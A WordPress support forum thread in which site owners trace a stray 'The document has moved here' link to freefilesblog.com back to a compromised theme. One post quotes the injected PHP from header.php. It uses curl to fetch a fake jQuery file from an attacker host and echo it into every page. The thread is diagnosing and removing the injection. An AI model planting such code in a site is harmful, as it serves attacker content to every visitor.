WordPress.org

Ready to get started?Download WordPress

Forums

The document has moved here on top of every page ? (8 posts)

  1. StefanRisticDev
    Member
    Posted 1 year ago #

    Hi Fellas!

    I'm having a really strange(at least to me) problem.

    I've just installed wordpress and populated it with demo content(lorem ipsum etc), and I'm getting this at every page/post:

    The document has moved here

    where "here" is hyperlinked to:

    http://ww10.freefilesblog.com/

    After a solid research I found out that this is printed from class-wp-atom-server.php, from line 1212(same as in the original file).

    I've tried to remove that line, but the text persists at the very top of the page ? :S It is also weird to me that it is linking to freefilesblog.com...

    So, is this caused by some settings in my hosting, or something(maybe malware) is inserted to change the url to freefilesblog.com ?

  2. Pioneer Valley Web Design
    Member
    Posted 1 year ago #

    If you did not put the link there, it came from somewhere (it's not random) - review your site at Securi and contact your web host.

  3. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    What theme are you using? Some themes contain "bad stuff..."

  4. drarkan
    Member
    Posted 1 year ago #

    I am getting the same issue on my site. http://imaginariusfantasticus.com/

    Haven't looked into the files yet to delete the corrupted lines. Site comes up clean from Sucuri Site check Imaginarius Fantasticus

    I have Pagelines Platform Pro on this site, I have basic addons that came with Word Press, and a Twitter plugin.

    I will see if the twitter plugin is the cause.

    My other site I run does not have this issue. Vikings Dragons & Fairies

    @StefanRisticDev: What addons do you have installed?

  5. drarkan
    Member
    Posted 1 year ago #

    Fixed

    Did a little digging of myself. Found in the Header.php file of Platform Pro theme folder:

    /wp-content/themes/platformpro

    This line

    <?php
    if(function_exists('curl_init'))
    {
     $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
     $ch = curl_init();
     $timeout = 5;
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
     $data = curl_exec($ch);
     curl_close($ch);
     echo "$data";
    }
    ?>

    Not sure how it got there it wasn't there before, I'll check my other site if this code is there, doubt it since its not displaying that on the page. My guess is malware strike, come and gone, so it imprints the code then leaves so it doesn't flag or some crap.

    So to fix, find this line in your header.php file in whatever theme you are using, and give it the boot wit the ol' DELETE Button!

  6. If you got that theme from the commercial theme provider then I'vebad news for you: your site is hacked and needs to be deloused. Seriously.

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

    If you got that theme from other places without paying for it, I seriously hope you locate the other exploits hidden in that code.

  7. drarkan
    Member
    Posted 1 year ago #

    Ok I found this code in the .htaccess file

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress

    Right when I started the website I did a backup to my computer, I found that the initial backup does not contain the code between the Begin and End wordpress.

  8. StefanRisticDev
    Member
    Posted 1 year ago #

    drarkan - Thank you for sharing your solution :) I've removed the few lines from my theme's header.php(same lines as yours) and the link at the top of the page is now gone.

    The bad thing is that we are surely hacked, but at least we know that :)

    As for the your .htaccess code, it looks fine. When you started your website, you probably didn't set the pretty permalinks, thats why your .htaccess was empty.

Topic Closed

This topic has been closed to new replies.

About this Topic